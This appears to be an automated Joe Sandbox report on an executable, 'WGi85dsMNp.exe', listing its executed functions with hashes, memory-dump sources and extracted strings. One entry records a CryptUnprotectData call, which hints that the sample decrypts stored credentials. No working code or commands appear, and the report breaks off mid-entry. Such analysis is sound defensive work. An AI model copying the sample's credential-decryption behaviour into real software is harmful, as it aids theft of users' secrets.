Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Analysis Process: WGi85dsMNp.exePID: 1476, Parent PID: 6200COMMON

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.6%
Total number of Nodes:	272
Total number of Limit Nodes:	14

Executed Functions

Function 00164328 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 00164590
Lj@p, xrefs: 00164518
0o@p, xrefs: 001643AA
Lj@p, xrefs: 0016452E
PH]q, xrefs: 001645A1

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: b0b5c59cea056ea7cae939b86f2c98d6c110d7e3dd192d775af1b817efe8df15
Instruction ID: c4dad6b83f72fe2a52a724b3d18b52f5a54b0f8dc450b58345a0820d680a20c1
Opcode Fuzzy Hash: b0b5c59cea056ea7cae939b86f2c98d6c110d7e3dd192d775af1b817efe8df15
Instruction Fuzzy Hash: D191D474E00258DFDB18DFA9D994A9DBBF2BF89300F14C06AE809AB365DB349945CF50

Function 00168DA0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

(o]q, xrefs: 001694D8
4']q, xrefs: 00168DC4
4']q, xrefs: 00168ECC
4']q, xrefs: 00169AD3

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: (o]q$4']q$4']q$4']q
API String ID: 0-875651895
Opcode ID: b9e99245ff28855bf87ff1970986bfe47e38a47e6d0e5ed36cd4888a702d062f
Instruction ID: c990244fbd0056e730567a61978df16ab3c97fa61deb78429572c325c66b1393
Opcode Fuzzy Hash: b9e99245ff28855bf87ff1970986bfe47e38a47e6d0e5ed36cd4888a702d062f
Instruction Fuzzy Hash: B0A28F70A04209DFCB15CFA8C994AAEBBF6BF88310F158569E405DB361DB34ED91CB91

Function 00165F90 Relevance: 5.5, Strings: 4, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 001661E8
(o]q, xrefs: 001661DA
,aq, xrefs: 00166252
,aq, xrefs: 00166260

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$,aq$,aq
API String ID: 0-1947289240
Opcode ID: c5469644ac7a50e428e1f50abbf936cd00899177ec13b74ee3091fbe6811c494
Instruction ID: 090f401a54fa3915b2cf66480ce639e1cfbee592abc18d7bd57d6592966a29a5
Opcode Fuzzy Hash: c5469644ac7a50e428e1f50abbf936cd00899177ec13b74ee3091fbe6811c494
Instruction Fuzzy Hash: D8024D31A00219DFCB15CFA9CD94AAEBBF6FF89314F15806AE805AB261DB30DD55CB50

Function 35A9BDF0 Relevance: 2.0, Strings: 1, Instructions: 758COMMON

Download Yara Rule

Strings

Te]q, xrefs: 35A9C796

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: b558c348e5adb761a24b229ebcca5b379b32c2048ace9d52a61f1ff072471c84
Instruction ID: 21a83d25077572c4979a5a7bc1e4ea917cd7681f141d92209aae26e54691df23
Opcode Fuzzy Hash: b558c348e5adb761a24b229ebcca5b379b32c2048ace9d52a61f1ff072471c84
Instruction Fuzzy Hash: D772D374A01268CFDB25EF64D994BADB7B6FF89300F1084A9D80967365CB359E82CF44

Function 354BD1EC Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(000000A8,?,00000000,?,?,?,?), ref: 354BDA45

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 8080b0685b651fc4cab27d7d7d896c6bac081e99c9c74aecb1c3768e0bea46e4
Instruction ID: 05595f77d70b7269784b1301a9ba72fe14f0d1e4bdf1c9796f04280629c2bdb9
Opcode Fuzzy Hash: 8080b0685b651fc4cab27d7d7d896c6bac081e99c9c74aecb1c3768e0bea46e4
Instruction Fuzzy Hash: C81156B6800249AFDB10CF99C845BEEBFF4EF48320F148459E659A7210C379A950CFA1

Function 354BD9D9 Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(000000A8,?,00000000,?,?,?,?), ref: 354BDA45

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 6f9ec0e0f649f5ae5aacdeecbcd8cddc4012ee5d8a9c3ae170e076d2bda9ce87
Instruction ID: 571b708f77e328dba5422824a097c6d8e499e607c6050fa933ddb7e9be7dda32
Opcode Fuzzy Hash: 6f9ec0e0f649f5ae5aacdeecbcd8cddc4012ee5d8a9c3ae170e076d2bda9ce87
Instruction Fuzzy Hash: 3E1137B68002499FDB10CF99C944BDEBFF4EF48320F148459E659A7210C779A550DFA5

Function 354B0C28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

4, xrefs: 354B0C99

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-967804232
Opcode ID: a1eea5043a421090c052c3b6c339913acfa4815cad248d9c02d4a1ad56b436c5
Instruction ID: 579e8671b05eee1803564839a42de822cce8a22422b4a9ace4143b2f019d90c8
Opcode Fuzzy Hash: a1eea5043a421090c052c3b6c339913acfa4815cad248d9c02d4a1ad56b436c5
Instruction Fuzzy Hash: 54A1F474E002088FEB14DFA9C544BDDBBB1FF88315F20826AE449A7291DB749985CF55

Function 35A99D10 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

0^L5, xrefs: 35A99FF0

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 0^L5
API String ID: 0-3174228013
Opcode ID: e9175eef24feba469106ec13f2d52f22be11fb17fe6cfbeb86d76c9c9ef81322
Instruction ID: 56c901db8b493941bd7fd82d4d960b83d998a34b57a1b1e39d9a5c8c842ce204
Opcode Fuzzy Hash: e9175eef24feba469106ec13f2d52f22be11fb17fe6cfbeb86d76c9c9ef81322
Instruction Fuzzy Hash: 28A18174E052289FEB18CF6AC944BDDBBF2BF89300F14C0AAD409A7255DB745A85CF51

Function 35A9A360 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

0^L5, xrefs: 35A9A640

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 0^L5
API String ID: 0-3174228013
Opcode ID: bebf0ce099f593c61879b4fd31edd319412646a4fc2cb0d36fbaf62c9a931912
Instruction ID: 18b6eb064aeef96efa84bceba9376c3a454f7e72f4a356124c60cc702f014c51
Opcode Fuzzy Hash: bebf0ce099f593c61879b4fd31edd319412646a4fc2cb0d36fbaf62c9a931912
Instruction Fuzzy Hash: 0FA18375E012288FEB18CF6AC944BDDBBF2BF89300F14C0AAD809A7255DB745A85CF51

Function 35A996C8 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

0^L5, xrefs: 35A999A4

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 0^L5
API String ID: 0-3174228013
Opcode ID: 255b9c65ff3163857357256fa0db5de9f75eab2efb4304fa9bf652c1b2eb34da
Instruction ID: dd224a11c289a57e0b860b9bd0d374b2534c86f65c771588e3e82294acbc308a
Opcode Fuzzy Hash: 255b9c65ff3163857357256fa0db5de9f75eab2efb4304fa9bf652c1b2eb34da
Instruction Fuzzy Hash: EFA181B4E052289FEB18CF6AC944BDDBBF2BF89300F14C0AAD409A7255DB745A85CF11

Function 35A9A9B0 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

0^L5, xrefs: 35A9AC8B

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 0^L5
API String ID: 0-3174228013
Opcode ID: 1e37525412da1c34f7b85c31f082fbc722e1ea4004a9356ce731432497b9c49f
Instruction ID: f1c998400e8ad1ff66afb7dfb9d834e53f24dbab9c3d7a5970884513973cc3b3
Opcode Fuzzy Hash: 1e37525412da1c34f7b85c31f082fbc722e1ea4004a9356ce731432497b9c49f
Instruction Fuzzy Hash: C3A17375E012288FEB18CF6AC944BDDBBF2BF89300F14C1AAD809A7255DB745A85CF51

Function 35A9A9A0 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

0^L5, xrefs: 35A9AC8B

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 0^L5
API String ID: 0-3174228013
Opcode ID: 94599f3151bdf0964cf11a6967da554e4a5f0e3d3aeb0c9bde650274fc3f54a6
Instruction ID: e96b26ec64f1974a74abbfa3771cc76372a32e61c0a45814f27e1c82b82338b5
Opcode Fuzzy Hash: 94599f3151bdf0964cf11a6967da554e4a5f0e3d3aeb0c9bde650274fc3f54a6
Instruction Fuzzy Hash: A17185B4D016288FEB68CF6AC944BDDBAF2BF89300F14C0AAD40DA7254DB345A85CF51

Function 35A98650 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e4fc9aed5a37239af4bc8eee0ad7c42c874e3e59c65d2431097d7391b0901d
Instruction ID: e8c9cacba1358c8998312f3352482e30054e34359599ccb1e965a6dc947afe0d
Opcode Fuzzy Hash: 75e4fc9aed5a37239af4bc8eee0ad7c42c874e3e59c65d2431097d7391b0901d
Instruction Fuzzy Hash: AC72CD74E052298FDB68DF69C980BD9BBF2BF49301F5481E9D809A7251DB349E82CF50

Function 354BC638 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b6358c1c8628ae5c674b47556363986a9afbaab834d0af5e73e74fb4cac07f
Instruction ID: b4dfe810acfe25614321492c7b486aba7e24d7904faf8e265323a28f4e8079ac
Opcode Fuzzy Hash: 73b6358c1c8628ae5c674b47556363986a9afbaab834d0af5e73e74fb4cac07f
Instruction Fuzzy Hash: B7E1CF74E01218CFDB14DFA5C994B9DBBB2BF49304F2081AAD449B73A1DB755A86CF20

Function 35A91400 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee365748c9b7179c1806279eeee0d5a343a8da9604850cd4c03bc30548bd8bc
Instruction ID: eb3d74f05f6a07db1f1105eb851a0e13e03d72e3dc97153ef09fe2a531f26e41
Opcode Fuzzy Hash: cee365748c9b7179c1806279eeee0d5a343a8da9604850cd4c03bc30548bd8bc
Instruction Fuzzy Hash: 49C19274E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359D86CF50

Function 354B03C4 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e14e383cc49406a7835b187ad9c503b8c6cff694726924117328cad08c69859
Instruction ID: b8154b703af662c1fab350a44e01a94f4e08a92d6dc607da1b019f9835719049
Opcode Fuzzy Hash: 7e14e383cc49406a7835b187ad9c503b8c6cff694726924117328cad08c69859
Instruction Fuzzy Hash: D1C18F74E00218CFDB54DFA5C994B9DBBB2BF88301F1085A9D809A73A5DB759E86CF10

Function 354B0F6F Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4101370fd5d55c053fd65fe8bf12c7fb27a3099de0c4544e8fa329f686e81e5
Instruction ID: 52f9607e8b5dc6abdf2ca5f706e7d14346c2b6a30b4065026d9fedc3e42904dd
Opcode Fuzzy Hash: f4101370fd5d55c053fd65fe8bf12c7fb27a3099de0c4544e8fa329f686e81e5
Instruction Fuzzy Hash: 2291F374A04208CFEB14DFA8C584BDCBBB1FF49311F20929AE449B7291DBB59985CF64

Function 35A9BA97 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0ed763ce2260fab39b49a2921d73993494998b1f21be0b7808d4f45a0fccad
Instruction ID: c9c7be03d01d2d48bdbed9fe7f3b8c4d11f2fe81f4ae6b524629e83331823f19
Opcode Fuzzy Hash: ca0ed763ce2260fab39b49a2921d73993494998b1f21be0b7808d4f45a0fccad
Instruction Fuzzy Hash: 2A81E574E0525C8BDB08DFAAC990ADDBBF2BF88301F64C529D814BB395DB349942DB50

Function 35A9C92F Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b740b5a21e858089715cb804c16034c6cf7270f9afc667f75ba54080d29903
Instruction ID: 842fa4f6f305a3ad432f015fdc4d37c4dd0b2710ceb48df0f3244ec29c340778
Opcode Fuzzy Hash: 08b740b5a21e858089715cb804c16034c6cf7270f9afc667f75ba54080d29903
Instruction Fuzzy Hash: 99612C74A00258CFDB15EF65D954BADBBBAFF88300F1088AA980A77365CB355D86DF04

Function 35A99D00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17eb9ef450effcca6f98c9ee28248d224ea7c94843d9606aaf30dc85691e4585
Instruction ID: f4192ac8c9fb47ddc3f434347a912c1f3acb1baaa9c83697ee179aae3568cf76
Opcode Fuzzy Hash: 17eb9ef450effcca6f98c9ee28248d224ea7c94843d9606aaf30dc85691e4585
Instruction Fuzzy Hash: 40415AB1D016189BEB58CF6BCD457CAFAF3AFC8304F04C1AAC50CA6264DB744A868F51

Function 35A913F0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d62ad40a60a519e453909f5a17a2743c378efc8c386a4e0b530e5cb25750f6
Instruction ID: 91d7b5f4dc438b4c985a7d0cfb2e75402b39a0ddc20a7ca843cf263495692167
Opcode Fuzzy Hash: 71d62ad40a60a519e453909f5a17a2743c378efc8c386a4e0b530e5cb25750f6
Instruction Fuzzy Hash: 9B410874E012488BEB08DFAAC540ADDFBF2BF89300F20D12AD419BB254DB345946CF50

Function 001666B8 Relevance: 10.5, Strings: 8, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 00166BC7
(o]q, xrefs: 001667DD
(o]q, xrefs: 001667B1
(o]q, xrefs: 001666F6
,aq, xrefs: 00166B68
(o]q, xrefs: 00166BD7
,aq, xrefs: 00166B58
(o]q, xrefs: 0016687A

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: a9c780b96feb54b093459d2525978944327c39620b064328853d26195964ef75
Instruction ID: 9a8e2356672f1088a391f5fc8312f1dba31c7e7483d8e50387973a427ce335ce
Opcode Fuzzy Hash: a9c780b96feb54b093459d2525978944327c39620b064328853d26195964ef75
Instruction Fuzzy Hash: E6127D30A00609DFCB14CF69D984AAEBBF6FF88314F158569E849EB265DB30ED51CB50

Function 001619B8 Relevance: 8.5, Strings: 6, Instructions: 969
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 00161B2F
Xaq, xrefs: 00161A76
Xaq, xrefs: 00162CBE
Xaq, xrefs: 00161AB0
Xaq, xrefs: 00162C95
Xaq, xrefs: 00161B7C

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
API String ID: 0-499371476
Opcode ID: 9bca9c6fb7c30bb3cccb2f8dfcb0fce47b46616cefc2358c11cc9bd89141bcf5
Instruction ID: 4b71dd13f10286f80fed18a5fe5efc0aebe8ae1029f83769bd249a8b831c5932
Opcode Fuzzy Hash: 9bca9c6fb7c30bb3cccb2f8dfcb0fce47b46616cefc2358c11cc9bd89141bcf5
Instruction Fuzzy Hash: 00724D2960D3D29FDB264F305CFB595BFE09E4314476D0ADEE0C1660A3DAA987A9C313

Function 35DF0970 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 35DF09FE
GetCurrentThread.KERNEL32 ref: 35DF0A3B
GetCurrentProcess.KERNEL32 ref: 35DF0A78
GetCurrentThreadId.KERNEL32 ref: 35DF0AD1

Memory Dump Source

Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 22826fa2eac0ee61bf7c1bb099ddd4d0f3efa23cc51748148122bd2e2ed1a753
Instruction ID: f8284a1b675e83577405768de3b0f2179aa040f161fb4bf46719c028e5f5269c
Opcode Fuzzy Hash: 22826fa2eac0ee61bf7c1bb099ddd4d0f3efa23cc51748148122bd2e2ed1a753
Instruction Fuzzy Hash: 175146B49012499FDB08DFA9D548BEEBBF1FF89300F208459D40AB7360D739A940CB65

Function 35DF0980 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 35DF09FE
GetCurrentThread.KERNEL32 ref: 35DF0A3B
GetCurrentProcess.KERNEL32 ref: 35DF0A78
GetCurrentThreadId.KERNEL32 ref: 35DF0AD1

Memory Dump Source

Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6738d217de89e10b09cda58e4e752297f108b7caedac5b93c0b67a784447332d
Instruction ID: 92d226543db2f3ece6c0f53ec737016ddd00a9908a61888d687eca15c26adb33
Opcode Fuzzy Hash: 6738d217de89e10b09cda58e4e752297f108b7caedac5b93c0b67a784447332d
Instruction Fuzzy Hash: 615136B49012499FDB08DFA9D548BEEBBF5FF89300F208459D41AA7360DB39A940CF65

Function 35A9D548 Relevance: 3.9, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

drL5, xrefs: 35A9D56D
4']q, xrefs: 35A9D5ED
4']q, xrefs: 35A9D5CA

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 4']q$4']q$drL5
API String ID: 0-2837428152
Opcode ID: d47f94c3c85f4595021d9a4a3086ebdd86a85db8d0cb65e5c752d0a1058c638d
Instruction ID: 1eedc68fc8a0ea364b0a67f8534a188dfaea61b99280d6be0c0bc975abaa6ac7
Opcode Fuzzy Hash: d47f94c3c85f4595021d9a4a3086ebdd86a85db8d0cb65e5c752d0a1058c638d
Instruction Fuzzy Hash: 26516370A001499FCB09EFA8D5519DEBBF1FF85300F1085A5D045BB266DB35AD46CF91

Function 35A97920 Relevance: 3.9, Strings: 3, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<CL5, xrefs: 35A97B22
<CL5, xrefs: 35A97AEB
<CL5, xrefs: 35A979D4

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: <CL5$<CL5$<CL5
API String ID: 0-875145483
Opcode ID: 8e0751c6f2ca65bf26c187293f237728e5227c2e8c0ab4e7c332a24a92d66815
Instruction ID: 7afbfc2fef1a1855672c22e2fad3d2234bd85cbfcca796afcfce61178927f09e
Opcode Fuzzy Hash: 8e0751c6f2ca65bf26c187293f237728e5227c2e8c0ab4e7c332a24a92d66815
Instruction Fuzzy Hash: 45513374E01318DFDB18DFA5D944AAEBBB2FF89301F208529D80AAB365DB355946CF40

Function 00164F00 Relevance: 2.8, Strings: 2, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 00164FEB
Haq, xrefs: 0016501E

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: f38a2accf9ad94bec976c8e3dbdeac45ca715ff0bd1592d3e5d072e57246dc10
Instruction ID: 2dd80cea8bd8513598f3400f0b909c55bcaaaf35bef275f5f460d8bb5c98e786
Opcode Fuzzy Hash: f38a2accf9ad94bec976c8e3dbdeac45ca715ff0bd1592d3e5d072e57246dc10
Instruction Fuzzy Hash: DBB1D0343046518FCB199F38CC98B6A7BE7AF89304F158569E846CB3A5CB34CD92DB91

Function 00165460 Relevance: 2.7, Strings: 2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 00165540
,aq, xrefs: 00165536

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: da3ebb8e284ed70e7b4e3f02b9d1e1987ba10f1dcad5f4edfe32e6921525af82
Instruction ID: 6ef2724b800504cd0384555161df4c372be9a13a62adb1ddf6fd0f04a6c67496
Opcode Fuzzy Hash: da3ebb8e284ed70e7b4e3f02b9d1e1987ba10f1dcad5f4edfe32e6921525af82
Instruction Fuzzy Hash: C4817D34A009068FCB18DF69CD889AAB7B3BF88315F658169D416DB365DB31EC51CF60

Function 35A97913 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

<CL5, xrefs: 35A97B22
<CL5, xrefs: 35A97AEB

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: <CL5$<CL5
API String ID: 0-2820493851
Opcode ID: b20de7078ad2d3747830d9503869cd077d7e216feca247385f6b608aad63670f
Instruction ID: 04b1582a5b84fc9b202b41053230e5ccddc442d504dbc45e8182abff8fb0b323
Opcode Fuzzy Hash: b20de7078ad2d3747830d9503869cd077d7e216feca247385f6b608aad63670f
Instruction Fuzzy Hash: 96314670D023299EEB04CFA5D444BDEBBF2BF86305F40846AD815BB280DB79554ACB51

Function 00168D19 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4']q, xrefs: 00168D2D
4']q, xrefs: 00168D44

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: cc242fcd0937e7e060f8822dc71561bb7d76bc92bb73f3f10706ada5e6d9adea
Instruction ID: e67a6c7aaeecd4ecaffa88befa96b91d9952121c0a5fb09110c44e6b287c497c
Opcode Fuzzy Hash: cc242fcd0937e7e060f8822dc71561bb7d76bc92bb73f3f10706ada5e6d9adea
Instruction Fuzzy Hash: 25F0C2353002142FDB081AAA9C5497B7ACBEFCC3A0B048529F90AC73A0DE75CC1183B1

Function 35DF00B0 Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

